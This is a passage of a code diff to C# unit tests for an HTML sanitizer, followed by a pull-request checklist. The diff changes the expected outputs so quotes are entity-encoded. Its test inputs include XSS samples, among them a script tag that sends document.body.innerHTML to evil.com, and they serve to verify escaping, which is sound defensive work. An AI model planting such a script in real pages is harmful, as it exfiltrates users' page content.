         const string input = "<iframe src='malicious.html'></iframe>";
         var result = HtmlSanitizer.Sanitize(input);
-        Assert.Equal("&lt;iframe src='malicious.html'&gt;&lt;/iframe&gt;", result);
+        Assert.Equal("&lt;iframe src=&#39;malicious.html&#39;&gt;&lt;/iframe&gt;", result);
     }
 
     [Fact]
@@ -163,7 +162,7 @@ public class HtmlSanitizerTests
             "Check this review: <script>fetch('http://evil.com?data=' + document.body.innerHTML)</script>";
         var result = HtmlSanitizer.Sanitize(input);
         Assert.Equal(
-            "Check this review: &lt;script&gt;fetch('http://evil.com?data=' + document.body.innerHTML)&lt;/script&gt;",
+            "Check this review: &lt;script&gt;fetch(&#39;http://evil.com?data=&#39; + document.body.innerHTML)&lt;/script&gt;",
             result);
     }
 
@@ -200,9 +199,6 @@ public class HtmlSanitizerTests
             2. Generic constraint issue with `Foo<T>`
             """;
         var result = HtmlSanitizer.Sanitize(input);
-        // Note: Angle brackets are escaped even inside backticks for maximum safety.
-        // The markdown rendering will still preserve the backticks and format correctly,
-        // while preventing any HTML injection via those characters.
         Assert.Contains("&lt;T&gt;", result);
         Assert.DoesNotContain("<T>", result);
     }
@@ -220,6 +216,6 @@ public class HtmlSanitizerTests
     {
         const string input = """<img src="test.jpg" alt="bad<>quotes">""";
         var result = HtmlSanitizer.Sanitize(input);
-        Assert.Equal("""&lt;img src="test.jpg" alt="bad&lt;&gt;quotes"&gt;""", result);
+        Assert.Equal("&lt;img src=&quot;test.jpg&quot; alt=&quot;bad&lt;&gt;quotes&quot;&gt;", result);
     }
 }


### PR DESCRIPTION
## Checklist
- [x] I have read the [CONTRIBUTING.md](CONTRIBUTING.md)
- [x] I have signed off my commits using `git commit -s`
- [x] I agree that my contribution will be licensed under the Elastic License 2.0 and that the project owners may also include this contribution in commercial versions of the software.
